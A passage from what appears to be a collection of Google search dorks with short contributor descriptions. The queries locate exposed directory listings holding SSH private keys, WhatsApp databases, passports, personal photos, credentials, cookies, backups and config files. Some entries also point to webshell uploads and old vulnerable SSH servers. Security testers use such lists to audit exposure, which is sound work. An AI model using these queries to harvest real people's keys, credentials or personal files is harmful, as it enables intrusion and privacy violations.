intitle:\"index of\" \"onetoc2\" \"one\"\n# Date: 04/06/2015\n# Exploit Author: Sphearis\n# Vendor Homepage: NA\n# Software Link: NA\n# Version: NA\n# Tested on: ALL\n# CVE : NA\nThis dork allows you to see Onenote files stored in the open(*.one). These\nfiles can be read easily with Onenote or a compatible viewer, no password,\nno encryption.\nThe onetoc2 is added, it's a worthless file but is always inside a folder\ncontaining one or several onenote files(and it obviously helps narrowing\nthe search to what we're looking for)."}, {"dork": "intitle:\"index of\" inurl:\"no-ip.com\"", "description": "# Exploit Title: intitle:\"index of\" inurl:\"no-ip.com\"\n# Google Dork: intitle:\"index of\" inurl:\"no-ip.com\"\n# Date: 17/06/2015\n# Exploit Author: Sphearis\n# Vendor Homepage: NA\n# Software Link: NA\n# Version: NA\n# Tested on: ALL\n# CVE : NA\nThis dork allows you to browse files stored on a personal server(home)\nusing a dynamic dns service to update server IP.\nYou can replace \"no-ip.com\" with any other dynamic dns hosts:\n\"dyndns.org\"\n\"ddns.net\"\n\"dynamic-dns.net\"\n\"dynip.com\"\n\"tzo.com\"\nAnd so on..."}, {"dork": "intitle:index.of.pubs", "description": "Exploit title: intitle:index.of.pubs\nDescription: intitle:index.of.pubs\nSensitive Directories\nAuthor:fidah.org"}, {"dork": "intext:index of sym", "description": "Dork: intext:index of sym\nMost of hacker use auto server symlink script and grab all the config file\nof the server. Most of the script create a folder that name is sym. All\nconfig file stored in this folder.\nThank You\nAtik Rahman"}, {"dork": "inurl:\"/cms/app/webroot\"", "description": "inurl:\"/cms/app/webroot\"\nAuthor:ShockvaWe (mrnoone)\n \u00f6z\u00fcm"}, {"dork": "intitle:\"Index of\" \"WhatsApp Databases\"", "description": "this dork find db.crypt/.db files of whatsapp conversations\nyou can open them with\nhttps://code.google.com/p/hotoloti/downloads/detail?name=Whatsapp_Xtract_V2.1_2012-05-10-2.zip&\nthanks to pmbento\n--acid_burn9X"}, {"dork": "intitle:\"Index.of\" \"attachments\"", "description": "Directories with interesting info.\nHave Fun Responsible.\nDork by Rootkit Pentester."}, {"dork": "inurl:\"default.php\" intext:\"website\" \"has been successfully installed on the server!\"", "description": "Dork= inurl:\"default.php\" intext:\"website\" \"has been successfully installed on the server!\"\nDetails: Here is a list of files and directories in your public_html folder, it bypass directory-listening restriction.\nSilent_z3r0Pakistan Cyber Army"}, {"dork": "private parent intitle:index.of", "description": "http://www.google.com/search?q=private parent intitle:index.of\nDork for all sorts of juicy stuff!\nDecoy"}, {"dork": "inurl:users intitle:index.of", "description": "http://www.google.com/search?q=inurl:users intitle:index.of\nUser folders containing interesting files.\nDecoy"}, {"dork": "inurl:/aspnet_client/system_web/", "description": "Google dork Description: Juice Directory \"ASP\"\nGoogle search: inurl:/aspnet_client/system_web/\nNote:\nJuice Directory. - Yudha[at]glosmon.com"}, {"dork": "\"My Documents\" \"parent\" intitle:index.of", "description": "http://www.google.com/search?q=\"My Documents\" \"parent\" intitle:index.of\n\"My Documents\" folders shared on the interwebs...\nDecoy"}, {"dork": "\"Desktop\" parent intitle:index.of", "description": "http://www.google.com/search?q=\"Desktop\" parent intitle:index.of\nDesktops shared on the interwebs...\nDecoy"}, {"dork": "intitle:index.of parent inurl:repos", "description": "http://www.google.com/search?q=intitle:index.of parent inurl:repos\nShared repositories. Very interesting...\nDecoy"}, {"dork": "inurl:/server/webapps", "description": "Google Search: inurl:/server/webapps\nSubmission Date: 12/19/2015\nDescription: Apache Tomcat information disclosure.\nby @pwns4cash"}, {"dork": "intitle: Index of /awstats/data", "description": "Awstats Log file's directory can reveal file/directory location\nThese logs file may also reveal hosting account usernames,\nas awstats keep track of all files and folders traffic stats you can also\nget a chance to see some secret.txt or secret.php~\nRegards\nDevender Mahto\n@devendermahto"}, {"dork": "inurl:safm.asp ext:asp", "description": "inurl:safm.asp ext:asp\nhttp://atawho.blogspot.com.tr/2016/03/simple-asp-filemanager.html\natawho-sonadam"}, {"dork": "(intext:\"index of /.git\") (\"parent directory\")", "description": "This dork will find git repository's which may have sensitive information.\n(intext:\"index of /.git\") (\"parent directory\")\nEnjoy!\nnecrodamus"}, {"dork": "intitle:Index of /__MACOSX ...", "description": "MAC OS X. Parent Directory Wordpress information.\n-Xploit"}, {"dork": "inurl:/sites/default/files/webform/", "description": "Description: Drupal default web-forms' storage path, usually a lot of files there contains juicy info\nGoogle search: inurl:/sites/default/files/webform/\nDork Author: Serhii Pronin"}, {"dork": "inurl:trash intitle:index.of", "description": "One man's trash is another man's treasure.\ninurl:trash intitle:index.of\nDecoy"}, {"dork": "inurl:pictures intitle:index.of", "description": "inurl:pictures intitle:index.of\nLoads of personal pictures and what not \nSent from trump tower"}, {"dork": "inurl:/FCKeditor/editor/filemanager/upload/", "description": "inurl:/FCKeditor/editor/filemanager/upload/\nLet's you go through unprotected files in the FCKeditor\nwithout authentication."}, {"dork": "index:\"html/js/editor/fckeditor/editor/filemanager/connectors\"", "description": "name =find liferay file page\nGoogle dork Description:\nindex:\"html/js/editor/fckeditor/editor/filemanager/connectors\"\nDate: 2016-10-2\nAuthor: sultan albalawi"}, {"dork": "inurl:\".esy.es/default.php\"", "description": "Dork: inurl:\".esy.es/default.php\"\r\n\r\n\r\n\r\nYou can add \u201cHere is a list of files in your public_html folder\u201d in the dork \u2026\u2026\r\n\r\n\r\n\r\nDork by INILERM"}, {"dork": "Hostinger \u00a9 2016. All rights reserved inurl:default.php", "description": "Google Dork: Hostinger \u00a9 2016. All rights reserved inurl:default.php\nHostinger web hosting clients with default Public page, list of Sensitive Directories and list of files in public_html folder\nGoogle Dork by INILERM\n---\nEl software de antivirus Avast ha analizado este correo electr\u00f3nico en busca de virus.\nhttps://www.avast.com/antivirus"}, {"dork": "inurl:/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php", "description": "Google Dork: inurl:/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php\n\u2022 Refresh \n\u2022 Select All \n\u2022 Delete \n\u2022 Cut \n\u2022 Copy \n\u2022 Paste \n\u2022 New Folder \n\u2022 Upload \u2190 vulnerable exploit in process for upload webshell\n\u2022 Close \n\u2022 Info\nSensitive Directories and Files Containing Juicy Info\nIntext:Index of /fckeditor/editor/plugins/ajaxfilemanager\nGoolge Dork by INILERM"}, {"dork": "\"Powered by AutoIndex PHP Script\" ext:php", "description": "Google Dork: \"Powered by AutoIndex PHP Script\" ext:php\nSensitive Directories and Files Containing Juicy Info\nGoogle Dork by Ini Lerm"}, {"dork": "site:onedrive.live.com shared by", "description": "site:onedrive.live.com shared by\nThis dork identified shared archives in oneDrive.\nIt is important to be logged in to view the documents.\n- Thiago Barros"}, {"dork": "powered by h5ai", "description": "Google Dork: powered by h5ai\n*You can browse through files*\nNEAM :- Helmi"}, {"dork": "\"Index of\" inurl:\"/$Recycle.Bin/\"", "description": "Windows recycle bins might not seem very interesting, but you would be\nsurprised how much juicy info is in there!\nDxtroyer"}, {"dork": "intext:\"Index of /.git\"", "description": "Google Search:inurl: intext:\"Index of /.git\"\r\n\r\nExplanation:Most of the web-applications are maintained using git\r\nrepositories containing important data like\r\ndb-info,logs,configs,main-source code,etc. Many of them are forget to hide\r\nor remove the .git directory from live websites.Its can able to expose of\r\nimportant data.\r\n\r\n\r\nThankYou,\r\n\r\n*Vishnu Prasad P G*"}, {"dork": "intext:\"Index of /database\"", "description": "Explanation: Using this search we can able to get private database details\r\nincluding SQL and other database elements and contents.\r\n\r\n*Jineeb JN*"}, {"dork": "inurl:/sym/root/ intitle:index.of", "description": "Author: Felipe Molina (@felmoltor)\r\n\r\nDescription:\r\n\r\n Probable symbolic links to the root file system of the web server that can\r\nbe browsable. This can be produced by a missconfiguration of the server or\r\nbecause the server has been already compromised by a third party that\r\nwanted to explore the file system of the server easily.\r\n\r\nDork:\r\n inurl:/sym/root/ intitle:index.of"}, {"dork": "intext:/wp-content/plugins/woocommerce/templates/emails/plain/", "description": "When you dork with this,it will generate juciy information in parent\r\ndirectory , for best practice filter according to the country .\r\n\r\n\r\nFu2x2000"}, {"dork": "inurl:/wp-content/plugins/seo-pressor/classes/", "description": "When you dork with this,it will generate juciy information in parent\r\ndirectory , for best practice filter according to the country .\r\n\r\n\r\nFu2x2000"}, {"dork": "intext:\"index of /userfiles/file/\"", "description": "When you dork with this,it will generate juicy information to userfiles ,\r\nfor best practice filter according to the country .\r\n\r\n\r\nRegards\r\n\r\nFu2x2000"}, {"dork": "intitle:index.of .bashrc", "description": "Google Dork Search: *intitle:index.of .bashrc*\r\n\r\n*Explanation: *\r\n\r\nBash allows us to create our own shortcuts through the use of aliases and\r\nshell functions. Aliases can be declared in bash files. These aliases will\r\nlast as long as our shell session is present.\r\n\r\nTo create an alias insert the following command in to .bashrc file\r\n\r\n*alias alias_name=\"command_to_run\"*\r\n\r\nApache server comes with a default offline .bashrc file which can be\r\nexploited further if the alias commands are found.\r\n\r\n*Remediation:*\r\n\r\n1. Disable Directory listing in the server.\r\n2. Remove .bashrc files in the production server or remove the Read / Write\r\npermission of the file through internet.\r\n\r\n*Author: *Melvin Varkey"}, {"dork": "inurl:\"nfs://www.\" \"index of /\"", "description": "This dork return files shared in Network File System (NFS)\r\n\r\nTahani Al-Otaibi"}, {"dork": "intext:\"/wp-content/uploads/wpsc/\"", "description": "When you dork with this,it will generate juicy information, may have\r\nsensitive information in some cases ,\r\n\r\n\r\nRegards\r\n\r\nFu2x2000"}, {"dork": "\"lv_poweredBy\"", "description": "Folders with a lot of shared files!!!.\r\nEnjoy!.\r\n\r\nDork by Rootkit_Pentester."}, {"dork": "inurl:/openwebmail/cgi-bin/openwebmail/etc/", "description": "Dork Author: Tunahan G\u00dcRAL(r00t3rXCrypt0)"}, {"dork": "intext:\"Powered by ViewVC\" | intitle:\"ViewVC Repository Listing\"", "description": "intext:\"Powered by ViewVC\" | intitle:\"ViewVC Repository Listing\"\r\n\r\nViewVC Repository Listing\r\n\r\nManhNho"}, {"dork": "inurl:\"apps/backend/config/\"", "description": "Directories containing Symfony CMS juicy info and files\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:CV+index of", "description": "Able to search and download the CV from web directory.\r\n\r\n\r\nSang Bui"}, {"dork": "intitle:\"Index Of\" intext:\".Trash\"", "description": "Dorks containing trash folders on Linux/Unix machines.\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:index.of home/000~root~000/", "description": "This Dork lists files under Root Directory.\r\n\r\n\r\nAuthor: Parth S. Patel"}, {"dork": "intitle:\"Index.Of.Applications (Parallels)\" -stackoverflow -quora", "description": "Dork will give application folder of parallels virtual machines showing\r\nwhat is installed in the virtual machines\r\n\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:index.of inurl:/websendmail/", "description": "Sites with WebGais - Websendmail.\r\n\r\n\r\nAuthor: Parth S. Patel\r\nhttps://ca.linkedin.com/in/parthpateloscp"}, {"dork": ":DIR | intitle:index of inurl://whatsapp/", "description": "Unconfirmed Websites leaking Whatsapp Databases.\r\n\r\n\r\nAuthor: Parth S. Patel\r\nhttps://ca.linkedin.com/in/parthpateloscp"}, {"dork": "index of /node_modules/ -github -stackoverflow", "description": "Find a several of nodejs folders with important files.\r\n\r\nby Franciny Salles(#Bl4kd43m0n)"}, {"dork": "inurl:\"/wp-content/uploads/db-backup\"", "description": "Searching for the backup directory of WP-DB Backup plugin (WordPress).\r\n\r\nSang Bui"}, {"dork": "\"Powered by Apache Subversion version\"", "description": "Looking for the SVN source code folder.\r\n\r\nSang Bui"}, {"dork": "inurl:\"paypal\" intitle:\"index of\" backup | db | access -github", "description": "Some juicy information regarding paypal backups and more.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:revslider inurl:'/revslider+port'", "description": "infos and symlinks to revslider folders upload, plugins and settings,\r\nserver and port.\r\n\r\ngeezazkrays\r\n\r\ni was just searching in google if which port of revslider they use, and\r\nthis were the googledork showed me."}, {"dork": "inurl:\"RootFolder=\" Allitems \"confidential\" | \"classified\" | \"passwords\" | username", "description": "SharePoint directories exposing sensitive information, usernames and\r\nsomtimes passwords\r\n\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:'listprojects.spr'", "description": "Dork show a list of project in Codebeamer directory\r\n\r\nAuthor: Brain Reflow"}, {"dork": "allintext:'HttpFileServer 2.3k'", "description": "Dork about sensitive directory of HFS File Share Server\r\n\r\nallintext:'HttpFileServer 2.3k'\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intitle:\"index of /bins\" arm", "description": "Description: Find servers infected with mirai\r\n\r\nAuthor: edm0nd"}, {"dork": "inurl:/wp-includes/certificates/", "description": "inurl:/wp-includes/certificates/\r\n\r\nFind a lot of certificates from websites"}, {"dork": "intitle:index.of id_rsa -id_rsa.pub", "description": "A simple dork to find SSH private keys indexed by google! Where many of the keys work\r\n\r\nHave Responsibly fun!\r\n__________________________________\r\nSecuritybits.io"}, {"dork": "\"Index of\" \"database.sql\"", "description": "\"Index of\" \"database.sql\"\r\n\r\nThis Google Dork discovers servers with open directories exposing \r\ndatabase files.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "\"index of\" \"database_log\"", "description": "\"index of\" \"database_log\"\r\n\r\nThis Google Dork discovers servers exposing sensitive SQL log data.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "\"index of\" \"database.sql.zip\"", "description": "\"index of\" \"database.sql.zip\"\r\n\r\nThis Google Dork discovers servers with open directories exposing \r\ndatabase backup files.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "intitle:backup+index of", "description": "Checking for the public backup folder on the web server, It might include\r\nthe sensitive files or database.\r\n\r\nSang Bui"}, {"dork": "inurl:/typo3/typo3conf", "description": "inurl:/typo3/typo3conf\r\nFind interesting files from TYPO3 CMS installation.\r\n\r\nby Franciny Salles (#Bl4kd43m0n)"}, {"dork": "intext:\"KRAB-DECRYPT.txt\" intitle:\"index of\"", "description": "This a a dork for search sites affected with GrandCrab ransowmare :\r\n\r\n[+] Dork : intext:\"KRAB-DECRYPT.txt\" intitle:\"index of\"\r\n\r\n[+] Linkedin : https://www.linkedin.com/in/mondher-smii/\r\n\r\n[+] Author : SMII Mondher\r\n\r\n[+] Email : smii.mondher@gmail.com"}, {"dork": "intext:pure-ftpd.conf intitle:index of", "description": "intext:pure-ftpd.conf intitle:index of\r\n\r\n\r\nThis Google Dork discovers servers exposing pure-ftpd configuration \r\nfiles.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "intext:my.cnf intitle:index of", "description": "intext:my.cnf intitle:index of\r\n\r\nThis Google Dork discovers servers exposing mysql configuration files.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "intext:\"paytm\" intitle:\"index of\"", "description": "Discovers PayTm config files and open directories of Sites.\r\n\r\nPayTm Sensitive Directories Expose on Sites\r\n\r\nGoogle Dork :- intext:\u201dpaytm\u201d intitle:\u201dindex of\u201d\r\n\r\nDate:- 15th Oct, 2018\r\n\r\nExploit Author:- Harsh Mukeshbhai Joshi"}, {"dork": "inurl:filebrowser.wcgp?subDir Communigate", "description": "Google Dork Description: Access Public and protected CommunigatePro mail server users' files.\r\nAuthor: Boumediene KADDOUR\r\ndate: 10/25/2018\r\nGoogle Search: inurl:filebrowser.wcgp?subDir Communigate"}, {"dork": "intitle:\"docker\" intitle:\"index of\" config", "description": "*Google Dork:- **intitle:\"docker\" intitle:\"index of\" config*\r\n\r\n*Description :- *\r\n\r\n*Discovers Docker config files and open directories of Sites.*\r\n\r\n*Docker Sensitive Directories Expose on Site**.*\r\n\r\n*Date :- 28th Oct, 2018*\r\n\r\n*Exploit Author :- Aman Bhardwaj *"}, {"dork": "intitle:\" - Revision\" + \"subversion version\"", "description": "Apache subversion directory listing\r\n\r\nManhNho"}, {"dork": "Index of /.svn", "description": "SVN directory\r\n\r\nManhNho"}, {"dork": "intitle:index of /.sql.gz intext:/backup/", "description": "Exploit Title: This Google Dork discover to gathering information of database schema and credentials data of mysql backup\r\nGoogle Dork: intitle:index of /.sql.gz intext:/backup/\r\nDate: 2018-11-10\r\nExploit Author: blackcat"}, {"dork": "inurl:/proc/tty/ index of", "description": "Exploit Title: Using this dork for gathering information by parent directory to discover vulnerable or credential file\r\nGoogle Dork: inurl:/proc/tty/ index of\r\nDate: 2018-11-10\r\nExploit Author: blackcat"}, {"dork": "intitle:\"index of /\" intext:/descargas/", "description": "Google Dork: intitle:\"index of /\" intext:/descargas/\r\n\r\nauthor: @nuria_pp"}, {"dork": "intitle:\"index of /\" intext:/Download/", "description": "Google Dork: intitle:\"index of /\" intext:/Download/\r\n\r\nauthor: @nuria_pp"}, {"dork": "index of kcfinder/", "description": "kcfinder directories\r\n\r\nManhNho"}, {"dork": "index of /ckeditor", "description": "ckeditor directories\r\n\r\nManhNho"}, {"dork": "intitle:\"index of /\" authorized_keys", "description": "Google Dork Description: intitle:\"index of /\" authorized_keys\r\nGoogle Search: intitle:\"index of /\" authorized_keys\r\nAuthor: @nuria_pp\r\nSensitive Directories: authorized_keys ssh and some rsa file"}, {"dork": "inurl:/wp-content/uploads/wp-backup-plus/", "description": "Dork\r\n*inurl:/wp-content/uploads/wp-backup-plus/*"}, {"dork": "intitle:'index of' \"error_log\"", "description": "Find various Wordpress directories containing error logs.\r\n\r\nintitle:'index of' \"error_log\"\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intitle:'index of' \"access_log\"", "description": "Find various Wordpress directories containing access logs.\r\n\r\nintitle:'index of' \"access_log\"\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intitle:\"index of /\" intext:/backup", "description": "Access to different backup files\r\n\r\n\r\nAuthor: Mattias Borg"}, {"dork": "index of /etc/certs/", "description": "certificate directories\r\n\r\nManhNho"}, {"dork": "intitle:\"Index of /private/\"", "description": "Search Private directories also work on Yahoo\r\n\r\nGoogle Dorks: *intitle:\"Index of /private/\"*\r\n\r\nAuthor: Rishabh Sharma (Lazy Hacker)"}, {"dork": "inurl:\"ai1wm-backups\"", "description": "Find WordPress backup files and publicly accessible wp-content directories."}, {"dork": "inurl:\"/irj/go/km/docs/\"", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ SAP files, filesystem information, file structure ++\r\n\r\ninurl:\u201d/irj/go/km/docs/\u201d\r\n- Large amounts of information\r\n- User data\r\n- Sensitive data\r\n- Documents\r\n- File structure of server\r\n- To exploit go to site and click on \u201cNavigation user interface\u201d\r\n- You can download the entire SAP servers directory\r\n- 86.600 results at the time of writing\r\n\r\nDISCLAIMER:\r\n(The vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system)\r\nSome of these are sourced from Onapsis, ERPscan and Rapid7 all have great sources on SAP testing"}, {"dork": "inurl:\"/irj/go/km/\" intext:navigation", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ SAP files, filesystem information, file structure ++\r\n\r\ninurl:\u201d/irj/go/km/\" intext:navigation\r\n- extract SAP server documents\r\n- Find SAP server\r\n- Find server structure\r\n- Find usernames and passwords\r\n- Find sensitive data\r\n- To exploit go to site and click on \u201cNavigation user interface\u201d\r\n- 1.890 results at the time of writing\r\n\r\nDISCLAIMER:\r\n(The vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system)"}, {"dork": "inurl:\"/webdynpro/resources/sap.com/\"", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ SAP software components and tools listing ++\r\n\r\ninurl:\u201d/webdynpro/resources/sap.com/\"\r\n- Find software installed on servers\r\n- Version info\r\n- SAP J2EE exploits\r\n- Exploit server software\r\n- Find adminconsole\r\n- Possible SQL Injection:\r\n - https://www.exploit-db.com/exploits/43495\r\n- Create new users\r\n- 1.670 results at the time of writing\r\n\r\nDISCLAIMER:\r\n(The vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system)"}, {"dork": "intitle:\"Index of /\" inurl:passport", "description": "intitle:\u201dIndex of /\u201c inurl:passport\r\nFind a lot of passports"}, {"dork": "intitle:\"index of /\" ssh", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ All sorts of Websites (a lot of colleges) ++\r\n\r\nintitle:\"index of /\" ssh\r\n\r\nData you find:\r\n - Webserver Version\r\n - SSH Version\r\n - SSH Keys\r\n - SSH Logins\r\n - SSH .exe files\r\n\r\nI found a lot of servers using < SSH 1.4.*\r\nThese are usually +5 years old and full of security holes\r\nA search in Exploit DB for SSH 1. turns up +40.000 exploits for these\r\nsome may work.\r\n\r\n++ 55 500 results at the time of writing ++\r\n\r\n\r\nDISCLAIMER:\r\nThe vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system."}, {"dork": "allintitle:\"Index of /ThinkPHP\" | inurl: \"/ThinkPHP/\"", "description": "Category : Sensitive Directories\r\n\r\nDescription : Dork for finding list of private directories such as library,\r\nlicence, config files and more in ThinkPHP framework used for websites\r\n\r\nDork : allintitle:\"Index of /ThinkPHP\" | inurl: \"/ThinkPHP/\"\r\n\r\nDate : 10/2/2019\r\n\r\nAuthor : Manish Bhandarkar (https://hackingforsecurity.blogspot.com/)"}, {"dork": "allintitle:\"Index of /Admin/Common\" | allintext:\"Parent Directory\"", "description": "Category : Sensitive Directories\r\n\r\n\r\nDescription : Dork for finding access of listed Admin directories which\r\nnormally restricted to normal users. Usually to access those files need an\r\nadmin login.\r\n\r\n\r\nNote : To access more sensitive files locate to parent directory until\r\n/admin or /conf etc.\r\n\r\n\r\nDork : allintitle:\"Index of /Admin/Common\" | allintext:\"Parent Directory\"\r\n\r\n\r\nDate : 10/2/2019\r\n\r\n\r\nAuthor : Manish Bhandarkar\r\n\r\nBlog : https://hackingforsecurity.blogspot.com/"}, {"dork": "allinurl:\"wp-content/plugins/wordpress-popup/views/admin/\"", "description": "Category : Sensitive Directories\r\n\r\n\r\nDescription : Dork for finding private directories inside wordpress-popup\r\nplugin including admin data which are present in Wordpress websites.\r\n\r\n\r\nNote : To access more sensitive files locate to parent directory until\r\n/admin or /conf etc.\r\n\r\n\r\nDork : allinurl:\"wp-content/plugins/wordpress-popup/views/admin/\"\r\n\r\n\r\nAlso Try : allinurl:\"wp-content/plugins/wordpress-popup/\"\r\n\r\n\r\nDate : 10/2/2019\r\n\r\n\r\nAuthor : Manish Bhandarkar\r\n\r\nBlog : https://hackingforsecurity.blogspot.com/"}, {"dork": "\"sasl_passwd\" | smtpd.conf intitle:\"index of\"", "description": "Postfix sensitive files, also passwords\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"/user\" | \"/users\"", "description": "This will show existing users in the system by simply going to the above\r\nmentioned directories.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" inurl:documents backup", "description": "Backup folders containing very juicy info\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:\"/cgi-bin/CVS/\"", "description": "AUTHOR: FlyingFrog\r\n\r\nTwitter: @ItsKarl0z\r\n\r\n++ Find filed in cgi-bin directories ++\r\n\r\ninurl:\"/cgi-bin/CVS/\""}, {"dork": "inurl:\"/.Trash\" intitle:\"index of\" ~", "description": "Juicy info in some *nix Trash bins.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" $Recycle.bin", "description": "Windows trash bins with a lot of juicy info.\r\n\r\nYou can also get drive letters and folders by attaching :%5C/\r\nbefore $Recycle.bin %5C is \"\\\"\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"/Windows/Recent\" | \"/Windows/History/\"", "description": "This will give you the most recent used files and the history data.\r\nThis is for Vista - Windows 10, it will not work against XP or Windows 2003\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"WindowsCookies\"", "description": "Cookies from Windows users.\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"Application Data/Microsoft/Credentials\"", "description": "Credentials in Windows folder\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "\"Last modified\" intitle:\"index of\" \"dropbox\"", "description": "Dropbox folders\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "\"description\" & \"size\" intitle:\"index of\" \"owncloud\"", "description": "Owncloud folders\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"/bitcoin/\"", "description": "Exploit : Access the Sensitive Directories using bitcoin directories\r\n\r\nGoogle Dork : intitle:\"index of\" \"/bitcoin/\"\r\n\r\nExploit Author:- Inspira Enterprise Pvt Ltd\r\n\r\nURL :- https://www.inspiraenterprise.com"}, {"dork": "intitle:\"index of\" \".pem\"", "description": "Exploit : Access the .pem (Privacy Enhanced Mail) file\r\n\r\nGoogle Dork : intitle:\"index of\" \".pem\"\r\n\r\nExploit Author:- Inspira Enterprise Pvt Ltd\r\n\r\nURL :- https://www.inspiraenterprise.com"}, {"dork": "intitle:\"index of\" \".dockerignore\"", "description": "Exploit : Access the Sensitive Directories using .dockerignore file\r\n\r\nGoogle Dork : intitle:\"index of\" \".dockerignore\"\r\n\r\nExploit Author:- Inspira Enterprise Pvt Ltd\r\n\r\nURL :- https://www.inspiraenterprise.com"}, {"dork": "intitle:\"index of\" \"/aws.s3/\"", "description": "Exploit : Access the Sensitive Directories of Amazon-Web-Services\r\n\r\nGoogle Dork : intitle:\"index of\" \"/aws.s3/\"\r\n\r\nExploit Author:- Inspira Enterprise Pvt Ltd\r\n\r\nURL :- https://www.inspiraenterprise.com"}, {"dork": "inurl:typo3conf/l10n/", "description": "Interesting directories from typo3 cms exploiting directory listing.\r\n\r\nBy Rayen Messaoudi (PsycoR)"}, {"dork": "inurl:/files/contao", "description": "This dork show some interested pdf files used in contao CMS.\r\n\r\nBy Rayen Messaoudi (PsycoR)"}, {"dork": "inurl:/uploads/wc-logs/", "description": "WooCommerce Classes Paypal Payment Information\r\n\r\ninurl:/uploads/wc-logs/\r\n\r\nDiscovered By: R3VANBASTARD"}, {"dork": "intitle:\"index of\" \"db\"", "description": "Exploit : Access the sensitive directories using \"db\" file.\r\n\r\nGoogle Dork : intitle:\"index of\" \"db\"\r\n\r\nExploit Author:- Jayson Zabate\r\nURL :- https://invalidwebsecurity.info/"}, {"dork": "intitle: \"index of\" \"includes\"", "description": "Exploit : Dorks allow you to access the sensitive directories (includes, wp-includes) using \"includes\" file.\r\nGoogle Dork : intitle: \"index of\" \"includes\"\r\nExploit Author:- Jayson Zabate\r\nURL :- https://invalidwebsecurity.info/"}, {"dork": "intitle: \"index of\" \"./\" \"./bitcoin\"", "description": "Search: BitCoin Directory Listing\r\n\r\nGoogle Dorks: intitle: \"index of\" \"./\" \"./bitcoin\"\r\n\r\nCategory : Sensitive Directories\r\n\r\nExploit Authors:- Om Ahuja\r\nJayesh Thakur\r\nMukul Kulshrestha\r\nHarsh Mukeshbhai Joshi\r\nSagar Shetty\r\n\r\nhttps://www.inspiraenterprise.com/"}, {"dork": "intitle:\"index of\" \".cpanel/caches/config/\"", "description": "Search: Cpanel Caches Config Directory Listing\r\n\r\nGoogle Dorks: intitle:\"index of\" \".cpanel/caches/config/\"\r\n\r\nCategory : Sensitive Directories\r\n\r\nExploit Authors:- Om Ahuja\r\nJayesh Thakur\r\nMukul Kulshrestha\r\nHarsh Mukeshbhai Joshi\r\nSagar Shetty\r\n\r\nhttps://www.inspiraenterprise.com/"}, {"dork": "intitle: \"Index of\" intext:log", "description": "Exploit : File Containing Juicy Info - Dorks allow you to view logs. (e.g.\r\n/log, file/log, ftplogs, server logs)\r\n\r\nGoogle Dork : intitle: \u201cIndex of\u201d intext:log\r\n\r\nExploit Author:- Jayson Zabate\r\nURL :- https://invalidwebsecurity.info/"}, {"dork": "intitle:\"Directory Listing For\" \"Filename\" intext:Tomcat/5.0.28", "description": "Exploit : Dorks allow you to access the sensitive directories of any web\r\napplication using Apache Tomcat/5.0.28.\r\n\r\nGoogle Dork : intitle:\"Directory Listing For\" \"Filename\"\r\nintext:Tomcat/5.0.28\r\n\r\nExploit Author:- Jayson Zabate\r\nURL :- https://invalidwebsecurity.info/"}, {"dork": "allintitle: \"index of/admin\"", "description": "# Google Dork: allintitle: \\\"index of/admin\\\"\r\n# By using this dork it is possible to access some admin login pages\r\nand parent directory structures ,we can access some vulnerable information\r\nlike framework used for the web site technology used for building the\r\nweb site and etc.\r\n\r\n# Date: 04/04/2019\r\n# Author: Ashwin Rajeev"}, {"dork": "type:mil inurl:ftp ext:pdf | ps", "description": "Dork : type:mil inurl:ftp ext:pdf | ps\r\n\r\nDescription : this dork gives you sensitive directories via ftp.\r\n\r\nAuthor : botsec0"}, {"dork": "\"/var/cache/registry/\"", "description": "# Exploit 